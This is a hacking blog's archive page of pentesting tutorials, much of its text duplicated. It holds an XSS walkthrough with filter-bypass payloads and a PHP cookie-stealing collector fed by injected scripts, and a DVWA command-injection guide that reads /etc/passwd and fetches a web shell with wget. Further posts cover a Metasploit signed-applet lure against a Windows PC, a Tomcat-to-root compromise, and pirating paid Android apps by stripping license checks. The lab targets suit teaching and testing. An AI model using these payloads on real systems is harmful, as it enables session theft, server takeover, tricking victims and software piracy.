After so long, another video tutorial made by my friend.
The tutorial is uploaded on his channel, so please take a minute and subscribe to him to show your support!
More tutorials will come soon!
Showing posts with label pentesting. Show all posts
Showing posts with label pentesting. Show all posts
Tuesday, 10 September 2013
[VIDEO] String Based Sql Injection Level 1
After so long, another video tutorial made by my friend.
The tutorial is uploaded on his channel, so please take a minute and subscribe to him to show your support!
More tutorials will come soon!
Wednesday, 10 July 2013
Complete Cross-site Scripting Walkthrough
Introduction
'XSS' also known as 'CSS' (Cross Site Scripting) is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute.
XSS is Dangerous
XSS is really dangerous , it's severity is High, because it could change the website DOM and could
lead to stealing credentials of the administrator , in these cases the attacker can control and
compromise the whole application.
What does the attacker want to achieve?
• Changing Setting
• Cookie theft
• False Advertising
• Steal a Form Tokens to make CSRF Easier
• And more , you have to be creative to exploit XSS.
• Cookie theft
• False Advertising
• Steal a Form Tokens to make CSRF Easier
• And more , you have to be creative to exploit XSS.
XSS Type
There are Three Types of XSS
• Persistent (Stored) XSS
◦ Attack is stored on the website,s server
• Non Persistent (reflect) XSS
◦ user has to go through a special link to be exposed
• DOM-based XSS
◦ problem exists within the client-side script
we will discuss each kind of these in details , as you will see.
• Persistent (Stored) XSS
◦ Attack is stored on the website,s server
• Non Persistent (reflect) XSS
◦ user has to go through a special link to be exposed
• DOM-based XSS
◦ problem exists within the client-side script
we will discuss each kind of these in details , as you will see.
Persistent (Stored) XSS
wikipedia definition :The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply Persistent XSS is occurs when the developer stores the user input data into database server or simply writing it in a file without a proper filtration , then sending them again to the client browser.
Persistent (Stored) XSS Demo
<?php
if(isset($_POST['btnSign']))
{
$message=trim($_POST['mtxMessage']);
$name=trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES (
'$message','$name');";
$result=mysql_query($query) or die('<pre>'.mysql_error().'</pre>');
}
?>
if(isset($_POST['btnSign']))
{
$message=trim($_POST['mtxMessage']);
$name=trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES (
'$message','$name');";
$result=mysql_query($query) or die('<pre>'.mysql_error().'</pre>');
}
?>
the two parameters in that code “message” and “name” are not sanitized properly ,the ,we store these parameters into the guestbook table, So when we displaying these parameters back the client browser, it will execute the malicious JavaScript code. For Demonstrating this we will exploit DVWA application.
After Submitting this form , Our JS code has been executed
Non Persistent (Reflected) XSS
The non-persistent (or reflected) cross-site scripting vulnerability is by far the
most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.
most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.
Non Persistent (Reflected) XSS Demo
Here is a php code that suffers form Reflected XSS
<?php
if(!array_key_exists("name",$_GET) | |$_GET['name'] == NULL || $_GET['name']==''){
$isempty=true;
}
else{
echo '<pre>';
echo 'Hello' . $_GET['name'];
echo '</pre>';
}
?>
if(!array_key_exists("name",$_GET) | |$_GET['name'] == NULL || $_GET['name']==''){
$isempty=true;
}
else{
echo '<pre>';
echo 'Hello' . $_GET['name'];
echo '</pre>';
}
?>
AS you can see that the “name” parameter doesn't sanitized and echo back to the user , so when the user inject a malicious JS code , It will execute. Now we will inject our malicious js Code , For demonstrating we will inject
<script>alert(/xss/)</script> For Demonstrating this we will exploit DVWA application
will inject an alert box Code “<script>alert("xss")</script>”
DOM based XSS
DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML contents which is called the Document Object Model (DOM) JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting upon the DOM.
simply that type occurs on the javascript code itself that the developer use in client side for example
"A typical example is a piece of JavaScript accessing and extracting data from the URL via the
location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping,entirely on client side."
simply that type occurs on the javascript code itself that the developer use in client side for example
"A typical example is a piece of JavaScript accessing and extracting data from the URL via the
location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping,entirely on client side."
DOM based XSS Demo
Suppose the following code is used to create a form to let the user choose his/her preferred language. A default language is also provided in the query string, as the parameter “default”. we will use the following code for demonstration purposes:
<select>
<script>
document.write("<OPTION value=1>"+document.location.href.substring
(document.location.href.indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script>
</select>
<script>
document.write("<OPTION value=1>"+document.location.href.substring
(document.location.href.indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script>
</select>
The page is invoked with a URL such as: http://www.some.site/page.html?default=French
A DOM Based XSS attack against this page can be accomplished by sending the following URL to
a victim: http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
The original Javascript code in the page does not expect the default parameter to contain HTML
markup, and as such it simply echoes it into the page (DOM) at runtime. The browser then renders
the resulting page and executes the attacker’s script:
alert(document.cookie)
Now we've discussed all types of XSS , so lets talk about some advanced techniques.
Advanced Techniques
there are some avoidance Techniques can be taken to protect a against XSS exploits but they are not
implementing well for example :
Tons of sites may seem vulnerable but not executing the code that occurs because some kind of
filtration methods and those may can be bypassed ,we will demonstrate most of them.
implementing well for example :
Tons of sites may seem vulnerable but not executing the code that occurs because some kind of
filtration methods and those may can be bypassed ,we will demonstrate most of them.
METHOD 1 : replace <script> with null string ""
here is the vulnerable code that suffers from reflected xss , that has a filtration :
as you can see ,in the previous code , the developer replace the string that called "<script>" with<?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
echo '</pre>';
}
?>
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
$isempty = true;
} else {
echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
echo '</pre>';
}
?>
a Null string "" .
Some common methods to bypass filteration is that you just have to replace the string "<script>"
with "<SCRIPT>" because the developer search for lowercase of "<script>" , so we bypass
it by change our script to <SCRIPT>.......</SCRIPT>
Here is an other way to bypass the previous filteration
<script type=text/javascript>alert("XSS")</script>
Please note its bad practice to use alert("XSS") to test for XSS because most of known sites block
the keyword XSS before.
METHOD 2 : magic quotes filtration
in this Technique , the developer uses technique that called magic quotes filtration ,by using
a PHP function called "addslashes()" that add slash before any special chars. So Our traditional
JavaScript code doesn't work
there are many ways to bypass that filter , we will discuss two of them
1- the easiest way to bypass it is Just DONT USE magic quotes simple is that , for example
declaring a variable and assigned , it to a number , then alert that variable.
AS you can see here: <script>var val= 1; alert(val)</script>
2- this way is some what tricky , in this way we use a built-in Function that convert Decimal values
into ASCII values , you can find a complete table of ASCII here http://www.asciitable.com/
this will help you write what you want OR you can use hackbar firfox add-ons to help you on
converting ASCII to decimal In my examples ill be writing "XSS" this is the following code
"120 115 115", Ok we now got the Decimal value of our string,we need to know what function I
n javascript converts this to ASCII this function called "String.fromCharCode()",and to use this with
alert as example , you dont need to use quotes any more.
<script>alert(String.fromCharCode(120, 115, 115)</script>
Ok now this will display or message in this case "XSS", this method is very useful for bypassing
magic quotes.
a PHP function called "addslashes()" that add slash before any special chars. So Our traditional
JavaScript code doesn't work
there are many ways to bypass that filter , we will discuss two of them
1- the easiest way to bypass it is Just DONT USE magic quotes simple is that , for example
declaring a variable and assigned , it to a number , then alert that variable.
AS you can see here: <script>var val= 1; alert(val)</script>
2- this way is some what tricky , in this way we use a built-in Function that convert Decimal values
into ASCII values , you can find a complete table of ASCII here http://www.asciitable.com/
this will help you write what you want OR you can use hackbar firfox add-ons to help you on
converting ASCII to decimal In my examples ill be writing "XSS" this is the following code
"120 115 115", Ok we now got the Decimal value of our string,we need to know what function I
n javascript converts this to ASCII this function called "String.fromCharCode()",and to use this with
alert as example , you dont need to use quotes any more.
<script>alert(String.fromCharCode(120, 115, 115)</script>
Ok now this will display or message in this case "XSS", this method is very useful for bypassing
magic quotes.
How Can an Attacker Steal cookies?
At first glance you hear about Stealing Cookies , you may think it need a hard work to
implement or even to understand , but i tell you that is so simple , just you will need
some programming background and XSS Vulnerability ,Simple is that .
the Scenario of stealing cookie is that , We will create a PHP file called collect_cookie.php
then we will upload it to any webhosting company , after that we will inject a java script
code that will send Cookies to our malicious website , When the php file recieve the
Cookie information , it will save it in afile called stolen_cookie.txt
To can steal cookie , we need to some issues :
• A PHP Script that will recieve the cookie
• the javascript code that will steal the cookie and send it to our malicious site
• a web hosting company that will host our php file
implement or even to understand , but i tell you that is so simple , just you will need
some programming background and XSS Vulnerability ,Simple is that .
the Scenario of stealing cookie is that , We will create a PHP file called collect_cookie.php
then we will upload it to any webhosting company , after that we will inject a java script
code that will send Cookies to our malicious website , When the php file recieve the
Cookie information , it will save it in afile called stolen_cookie.txt
To can steal cookie , we need to some issues :
• A PHP Script that will recieve the cookie
• the javascript code that will steal the cookie and send it to our malicious site
• a web hosting company that will host our php file
First : collect_cookie.php
Here is the PHP script that will use, to collecting Cookie and save them into stolen_cookie.txt
<?php
$collectedCookie=$HTTP_GET_VARS["cookie"];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
fclose($file);
echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="http://www.google.com/">here</a> to go back to previous page ';
?>
$collectedCookie=$HTTP_GET_VARS["cookie"];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
fclose($file);
echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="http://www.google.com/">here</a> to go back to previous page ';
?>
So lets understand what the script will do :
$collectedCookie=$HTTP_GET_VARS["cookie"];
in this line we will store the data that is stored in a get variable called cookie then
store it in avariable called collectedCookie
$date=date("l ds of F Y h:i:s A");
here we store the date of the connection Occurs , it tells us when these cookies have been
stolen.
$user_agent=$_SERVER['HTTP_USER_AGENT'];
here we store the user_agent of the victim for further attacks if it needs to.
$file=fopen('stolen_cookie.txt','a');
here we create a file called stolen_cookie.txt that has victim's cookie information
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$collectedCookie \n");
here we save the data as this format (“DATE: || USER AGENT || COOKIE”)
fclose($file);
her we close the file handle
echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="http://www.google.com/">here</a> to go back to previous page ';
here we print message on the screen (“Sorry , this page is under construction”)
and give him a link to click on it that send it to google.
Here we have finished the first filecthat will collect the cookie information
Second : javascript code
Here is the JavaScript code that we will inject into the victim server or browser.
We can inject any one of these scripts :
this script need user interaction because it print a link to the user , if the user
clicks on that link ,the redirection to our site with the cookie information will be
Done.
We can inject any one of these scripts :
<a onclick="document.location='http://127.0.0.1/collect_cookie.php?
cookie='+escape(document.cookie);" href="#">Click here for Details</a>
cookie='+escape(document.cookie);" href="#">Click here for Details</a>
this script need user interaction because it print a link to the user , if the user
clicks on that link ,the redirection to our site with the cookie information will be
Done.
<iframe width='0' height='0' frameborder='0'
src='<script>document.location='http://127.0.0.1/collect_cookie.php?
cookie='+escape(document.cookie);</script>' />
src='<script>document.location='http://127.0.0.1/collect_cookie.php?
cookie='+escape(document.cookie);</script>' />
This script doesn't need user interaction ,here we will inject an iframe in the
victim website and it's hidden so the victim can't see that ,and the connection
will be done.
Finally we will find the cookie by browsing the file that called stolen_cookie.txt
Article By SOG
Thursday, 6 June 2013
Local File Inclusion To Shell Tutorial Part 2
Hello Guys,
Today we have another tutorial from Foloox Csl,
On how to upload a shell in LFI with user-agent changing method, a new one.
Please subscribe to him
Sunday, 2 June 2013
Aircrack-ng Updated After 3 Years
Complete Aircrack-ng Changelog Version 1.2 beta 1
Version 1.2-beta1 (changes from aircrack-ng 1.1) – Released 25 May 2013:
- Airmon-ng: Added chipset information for ar9170usb, wl, rt2800usb, ar9271, wl12xx, RT3070STA, ath9k_htc, r871x_usb_drv, ath5k, carl9170 and various Intel drivers.
- Airmon-ng: Fixed chipset information ipw2200.
- Airmon-ng: Fixed output for r8187 driver.
- Airmon-ng: Improved chipset information for a few drivers.
- Airmon-ng: Support for displaying information about ath9k.
- Airmon-ng: Added ‘check kill’ to automatically kill services that could interfere.
- Airmon-ng: Fixed issues with Intel chipsets detection.
- Airmon-ng: Updated iw download link.
- Airmon-ng: Better mac80211 handling
- Airmon-ng: Added detection for WiLink TI driver, rtl819xU, iwlwifi.
- Airmon-zc: Improved version of Airmon-ng with more detailled information.
- Airdecap-ng: Fixed decoding QoS frames (Closes: #667 and #858).
- Airgraph-ng: Use Aircrack-ng Makefile instead of its own.
- Airbase-ng: Fixed bug using clients list.
- Airbase-ng: Fixed issue with QoS (ticket #760).
- Airbase-ng: Fixed sending beacons with null SSID.
- Airbase-ng: Allow non ASCII ESSID
- Airodump-ng: Fixed buffer overflow (ticket #728).
- Airodump-ng: Fixed channel parsing.
- Airodump-ng: Fixed FreeBSD battery reading.
- Airodump-ng: Renamed “Packets” column to “Frames” (“Packets” was not correct).
- Airodump-ng: Fixed XML bugs when outputting NetXML: ESSID containing ‘&’ or chinese characters, when multiple encryption are used.
- Airodump-ng: Add alternative paths for Airodump-ng OUI file.
- Airodump-ng: Added GPSd 2.92+ support (JSON).
- Airodump-ng: Add option –manufacturer to display manufacturer column on airodump-ng.
- Airodump-ng: Add feature to show APs uptime (–uptime) based on the timestamp.
- Airodump-ng-OUI-update: Fixed OUI URL and allow CURL redirect (ticket #829).
- Airdrop-ng: removed .py from file names.
- Airdrop-ng: Fixed bug in installer.
- Airdrop-ng: Fixed OUI lookup.
- Airdrop-ng: Fixed bug when several BSSID have the same ESSID.
- Airdrop-ng: Doesn’t constantly parse anymore, wait 5 seconds each time it parses.
- Airdrop-ng: Fixed crash when failing to get channel or when rules file didn’t exist.
- Airdrop-ng: Fixed to use lorcon.py/lorcon2 libs.
- Airdrop-ng: Updated README.
- Airdrop-ng: Fixed error preventing update to work.
- Versuck-ng: New script to do the same thing as the kismet autowep plugin from the CLI.
- Aircrack-ng: Fixed counter display error when cracking WPA.
- Aircrack-ng: Added output of the WPA handshake to EWSA project file.
- Aircrack-ng: Added output of the WPA handshake to oclhashcat+ project file.
- Aircrack-ng: Added benchmark option, -S.
- Aircrack-ng: Fixed -u option.
- Aircrack-ng: PIC fix for hardened systems from Francisco Blas Izquierdo Riera (klondike)
- Aircrack-ng: Allow dictionaries larger than 2Gb.
- Aircrack-ng: Give a better message when there’s an error with the dictionary.
- Aircrack-ng: Prevent a buffer overflow from happening (Wojciech Waga).
- Aireplay-ng: Added migration mode attack from Leandro Meiners and Diego Sor from Core Security (BlackHat Las Vegas 2010)
- Aireplay-ng, Airodump-ng: Added option to ignore issue with -1 channel.
- Airserv-ng: Fixed crash when clients disconnect.
- Besside-ng-crawler: Added EAPOL Crawler.
- Airdecloak-ng: Fixed bug when using pcap files with PPI headers.
- dcrack: Distributed cracking server/client
- wifi-detect.sh: reference script for testing wifi card detection using iwconfig vs ls /sys/class/net
- WPA Clean: Tool to merge and clean WPA capture files.
- Wireless Panda: C# Library to parse Airodump-ng output files (and added example project).
- OSdep (Linux): Setting fixed bitrates on mac80211 2.6.31 and up.
- OSdep (Linux): Added support for nl80211 thanks to impulse32. Use ‘make libnl=true’ to add netlink support (Ticket #1004).
- Manpages: Improvement and fixes for Airgraph-ng, Airodump-ng, packetforge-ng, Aircrack-ng
- Manpages: Fixed various spelling issues and single quote issues.
- Makefiles: Added tests for the different tools.
- Makefiles: Various fixes and improvements.
- Makefiles: Added support for libgrypt instead of OpenSSL via parameter.
- Patches: Added a few patches.
- Removed useless script: patchchk.
- Finally fixed licensing issues.
- Fixed endianness issues in most of the tools.
- Fixed cppcheck errors (Ticket #957).
- Fixed various compilation issues on Linux and Cygwin, GNU/Hurd, Darwin (OSX) and Sparc.
- Fixed compilation on recent gcc versions on Linux, Cygwin.
- Added instructions for Travis CI: Free Hosted Continuous Integration Platform for the Open Source Community.
- Various other small bug fixes.
DOWNOAD LINK:
http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz
Tuesday, 14 May 2013
C0mmand Executi0n Tut0rial - DVWA Low & Medium Lever
************THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY*************
Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App) It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because it's installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password
Command execution can be the most dangerous venerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.
So lets start exploiting!
Lets start with the Low level in DVWA.
The source is:
So lets try to run something like:
The output will be like the image bellow:
Note that a list of files were printed after the ping result. That's what the command "ls" do! So it's working, now lets have more fun!
Execute this command:
Well, it's time to own the system now! The commands are executing with no errors. Lets try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so lets use that:
All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php
this command will do it all:
So lets try!
Command ran successfully, lets check if our shell is there!
The shell will be in the same directory you're in, so just add /YourShellName.php to the link!
Nice! Now you have full, and easier to use shell access! and Also you get root access if you followed my Metasploit tutorials you'll know how!
OK! now we got the low lever, lets switch to the medium level in DVWA and try to get the same access we got now!
In medium level, they added a little bit of security to the code, but its not enough.
The code in medium is:
As you can see in the code above, they banned the characters ';' and '&&' but it's not really enough because we have another option which is '||'
But it's a little different with this one, because it means OR. So the shell doesn't always execute it when there is another command before it. So the way to use this one will be different than before, we wont add "google.com" then '&& COMMAND' but we will put '|| COMMAND' without anything before it!
Let's just give it a try and see if it's working!
the command 'ls' is working, everything is going fine!
But now, you'll need to use one ONLY command each time.
Hope you enjoyed it!
Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App) It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because it's installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password
Command execution can be the most dangerous venerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.
So lets start exploiting!
Lets start with the Low level in DVWA.
The source is:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
So lets try to run something like:
google.com && ls
The output will be like the image bellow:
Note that a list of files were printed after the ping result. That's what the command "ls" do! So it's working, now lets have more fun!
Execute this command:
google.com && uname -a && id && cat /etc/passwd
Well, it's time to own the system now! The commands are executing with no errors. Lets try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so lets use that:
All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php
this command will do it all:
google.com && wget YOUR_IP_ADDRESS/SecurityGeeks.txt && mv SecurityGeeks.txt SecurityGeeks.php
wget will get the shell, mv will change the name. You can get your IP address by running "ipconfig" in windows CMD or "ifconfig" in linux terminal.So lets try!
Command ran successfully, lets check if our shell is there!
The shell will be in the same directory you're in, so just add /YourShellName.php to the link!
Nice! Now you have full, and easier to use shell access! and Also you get root access if you followed my Metasploit tutorials you'll know how!
OK! now we got the low lever, lets switch to the medium level in DVWA and try to get the same access we got now!
In medium level, they added a little bit of security to the code, but its not enough.
The code in medium is:
<?php
if( isset( $_POST[ 'submit'] ) ) {
$target = $_REQUEST[ 'ip' ];
// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
if( isset( $_POST[ 'submit'] ) ) {
$target = $_REQUEST[ 'ip' ];
// Remove any of the charactars in the array (blacklist).
$substitutions = array(
'&&' => '',
';' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
As you can see in the code above, they banned the characters ';' and '&&' but it's not really enough because we have another option which is '||'
But it's a little different with this one, because it means OR. So the shell doesn't always execute it when there is another command before it. So the way to use this one will be different than before, we wont add "google.com" then '&& COMMAND' but we will put '|| COMMAND' without anything before it!
Let's just give it a try and see if it's working!
the command 'ls' is working, everything is going fine!
But now, you'll need to use one ONLY command each time.
Hope you enjoyed it!
Wednesday, 8 May 2013
How To Bypass vBulletin Forums Cloudflare - New Method
Hello guys,
Another video tutorial by Foloox on how to bypass cloudflare. New cool methods that I've never used. :)
The tutorial is on his channel, please subscribe to his channel!
The script used in the second method can be found here:
http://pastie.securitygeeks.net/47
Tuesday, 7 May 2013
How To Remove The License Verification From Android App/Games Using Lucky Patcher
Hello guys, Today I'm going to show you how to remove the license verification from apps and games. License Verification can be found in all paid apps, to check if you actually bought the app/game or downloaded it from somewhere else. Well, today we will remove that license verification and use paid apps for free, or most of them.
For this tutorial we will be using AfterMath XHD, which is a paid game on Google Play, as a demo.
- Rooted Android Device
- Lucky Patcher (Can Be Downloaded here)
- A Paid game to try to remove the License Verification from it
So, before I remove the license from the game, the game doesn't start because our license is invalid
As you can see in the picture bellow:
Now launch Lucky Patcher, it WILL need root permissions so let it grant the root permissions. When it opens it shows the list of all the apps with Google Ads, License Verification, and some more. (You can see my tutorial about remove Google ads from apps HERE)
The patch you chose will be already selected for you, so just click on Apply, it will start processing
This process can patch many apps, including famous ones like SPB Shell 3D! And the game above is one of top paid games in Google Store too.
Have fun, and try patching the apps you want!
Enjoy!
Monday, 6 May 2013
Local File Inclusion To Php Shell - LFI Tutorial
Hello guys,
Today I have another tutorial Submitted by Foloox Csl. It's a simple LFI Tutorial, to upload a shell using LFI Vulnerability
Enjoy! And please subscribe to him.
Sunday, 5 May 2013
Attacking Metasploitable - Apache Tomcat - Metasploit Tutorial
Hello guys,
Here's my second Metasploitable-Attacking video. Today we will exploit Apache Tomcat in Metasploitable use Metasploit of course.
Attack description:
Here's my second Metasploitable-Attacking video. Today we will exploit Apache Tomcat in Metasploitable use Metasploit of course.
Attack description:
- We did a full nmap port scan, and I detected tomcat installed in the server on port 8180
- Search for tomcat in Metasploit console "msfconsole" command to find any kind of auxiliary, and or an exploit available for it
- We found a good exploit which allows command execution, but it needed the USERNAME and PASSWORD of the target server
- I executed an auxiliary that tried the default tomcat Login details on the target server (This is good when the server admin uses bad passwords)
- We found the login details, That made the code execution exploit possible to use now
- We execute the code execution exploit, and we get shell access (You can change the payload, but you don't really need to)
- After we get the shell access, as we search in /root directory, we find /root/.ssh/authorized_keys
- As I saw in a post by g0tmi1k about the same attack, those keys have weakness (READ MORE HERE)
- We download "rsa" weak keys to kind of crack the key, the file can be found on exploitdb search "/pentest/exploits/exploitdb/searchsploit" search for the term "OpenSSL"
- Download, and extract the file, using "grep -lr KEY *.pub" we will find the right one.
- Connect to the server using the key, (you will find a file in the previous step with NUMBER.pub take the number) then run the command:
ssh -i NUMBER root@IP
And you're done, root access granted ^_^
Video Demo:
Video Available in HD, just change the Quality!
Sunday, 28 April 2013
How to install Backtrack and Metasploitable on Vmware - Metasploit
Hello guys,
Today I will show you how to install Backtrack 5 and Metasploitable-Linux on Vmware,
This Tutorial is just to get you guys ready to my Metasploit videos that I will release very soon.
First of all, you should download both Metasploitable-Linux (Our Target) and Backtrack 5 (Our attacker)
Download Backtrack for HERE
Download Metasploitable from HERE
Download VMWARE Player from HERE
When you download Backtrack, make sure you downloaded for 32-BIT Architecture.
I prefer KDE, which I will be using, and it always works on vmware. (GNOME give some graphics errors sometimes)
Today I will show you how to install Backtrack 5 and Metasploitable-Linux on Vmware,
This Tutorial is just to get you guys ready to my Metasploit videos that I will release very soon.
First of all, you should download both Metasploitable-Linux (Our Target) and Backtrack 5 (Our attacker)
Download Backtrack for HERE
Download Metasploitable from HERE
Download VMWARE Player from HERE
When you download Backtrack, make sure you downloaded for 32-BIT Architecture.
I prefer KDE, which I will be using, and it always works on vmware. (GNOME give some graphics errors sometimes)
Backtrack Installation
After you download backtrack, open vmware, and click on "Create A New Virtual Machine"
Then check "Installer disc image file (.iso), and browse for your backtrack image file, and open it.
Now click on Next, and choose "Linux" as the Guest operating system, and "Ubuntu" as the virsion
Click on "Next", Choose a name for your OS, any name is OK!
Now click on "Next" again, now it's your turn, you choose what disk size you want for it, and then click on Next again, then you're done! UNLESS, you want to edit some of the settings, and CPU & RAM for your OS, you can do by clicking on "Customize Hardware"
Now Play your virtual machine, wait for it until it shows a terminal saying "root@bt:~#"
type "startx" and click enter.
You're done!
Metasploitable-Linux Installation
Metasploitable is a vulnerable OS, it has many vulnerabilities.. We will use that OS as a target to pwn it..
When you download Metasploitable, it will be downloaded as a .zip file, extract it, and you will see a file with the extension .vmx
All you have to do to install this OS, is to double click on it.. vmware will ask you if you you copied the virtual machine, or moved it, click on I moved it!
And you're done!
Hope you liked it! =)
Thursday, 25 April 2013
How To Hack Windows 8 Using Metasploit - java_signed_applet
Hello guys,
Today I have my first Metasploit tutorial! We will be pentesting Windows 8 (My PC) Using Metasploit on Kali, inside a virtual machine.
So lets get started!
First thing you need to do is open Metasploit by running "msfconsole" in your terminal.
After metasploit loads, type this command:
Like the picture bellow:
Today I have my first Metasploit tutorial! We will be pentesting Windows 8 (My PC) Using Metasploit on Kali, inside a virtual machine.
So lets get started!
First thing you need to do is open Metasploit by running "msfconsole" in your terminal.
After metasploit loads, type this command:
use multi/browser/java_signed_applet
Like the picture bellow:
Now You have to set you local port, in this exploit its called SRVPORT. The default port is 8080, you can set it to any port you want.
Just run the command bellow:
set SRVPORT [Port number]
Change [Port number to anything you like, I used 1337.
Now to change the path to the exploit, we can set the URIPATH to anything we want.
We can leave all the settings as it is, but it will look a little bit ugly, things like:
0.0.0.0:8080/Kgn3Tn
Changing them will make people accept it more easily, and it's more fun!
To change the URIPATH run the following command:
set URIPATH /
Like the picture bellow:
Now run the command "exploit"
All you have to do now, is send the IP to someone to open. When they open it they'll see a screen like this:
If they ran it, a window will open, Check "I accept the risk and want to run this application" then click on "Run"
As soon as you run it, metasploit will start a meterpreter session to the target PC, and you'll have full access to the target PC!
Session Opened:
System info:
Hope you like it!
Here is the video tutorial, performing this attack!
Video available in HD, just change the quality! Vimeo Link: https://vimeo.com/64841698
Wednesday, 27 March 2013
How To Pentest With Your Android Device - dSploit
Hello guys!
Today I have a video tutorial about pentesting with you android device. I will be using a program called dSploit, it's free and you can download it HERE.
For this tutorial you need a ROOTED android device. that's it! :)
Today I have a video tutorial about pentesting with you android device. I will be using a program called dSploit, it's free and you can download it HERE.
For this tutorial you need a ROOTED android device. that's it! :)
Video is available in HD, just change the quality. Enjoy! :)
Subscribe to:
Posts (Atom)